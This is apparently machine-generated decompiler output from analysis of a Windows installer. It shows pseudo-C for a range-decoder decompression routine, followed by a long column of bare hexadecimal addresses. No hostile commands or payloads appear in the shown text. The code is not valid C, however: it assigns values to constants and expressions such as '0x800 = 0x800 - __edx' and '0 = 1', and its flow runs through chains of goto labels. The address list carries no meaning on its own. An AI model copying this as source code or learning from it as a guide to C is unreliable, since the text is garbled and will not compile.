							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                  0x00000000
                                                  0x0040667f
                                                  0x0040667f
                                                  0x00406683
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406749
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x0040699f
                                                  0x0040699f
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00406a15
                                                  0x00406a15
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x004069f0
                                                  0x004069f0
                                                  0x004069f4
                                                  0x00406ba3
                                                  0x00000000
                                                  0x00406ba3
                                                  0x00406a00
                                                  0x00406a07
                                                  0x00406a0f
                                                  0x00406a12
                                                  0x00000000
                                                  0x00406a12
                                                  0x00406689
                                                  0x0040668d
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00406bd1
                                                  0x00406bd5
                                                  0x00406bd5
                                                  0x00406693
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00406bb9
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00406bca
                                                  0x00000000
                                                  0x00406bca
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x004066de
                                                  0x004066de
                                                  0x004066e1
                                                  0x004066e1
                                                  0x004066e1
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061c0
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00000000
                                                  0x004061d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004061da
                                                  0x004061dd
                                                  0x004061e0
                                                  0x004061e4
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ea
                                                  0x004061ed
                                                  0x004061ef
                                                  0x004061f0
                                                  0x004061f3
                                                  0x004061f5
                                                  0x004061f6
                                                  0x004061f8
                                                  0x004061fb
                                                  0x00406200
                                                  0x00406205
                                                  0x0040620e
                                                  0x00406221
                                                  0x00406224
                                                  0x00406230
                                                  0x00406258
                                                  0x0040625a
                                                  0x00406268
                                                  0x00406268
                                                  0x0040626c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625c
                                                  0x0040625c
                                                  0x0040625f
                                                  0x00406260
                                                  0x00406260
                                                  0x00000000
                                                  0x0040625c
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627f
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406333
                                                  0x00406335
                                                  0x00406338
                                                  0x004063a9
                                                  0x004063ac
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x00000000
                                                  0x004063c0
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406343
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635b
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406370
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406380
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00000000
                                                  0x00406385
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638b
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00000000
                                                  0x0040639c
                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d6
                                                  0x004065f4
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406601
                                                  0x00406604
                                                  0x00406607
                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x00000000
                                                  0x00000000
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x00000000
                                                  0x0040670b
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
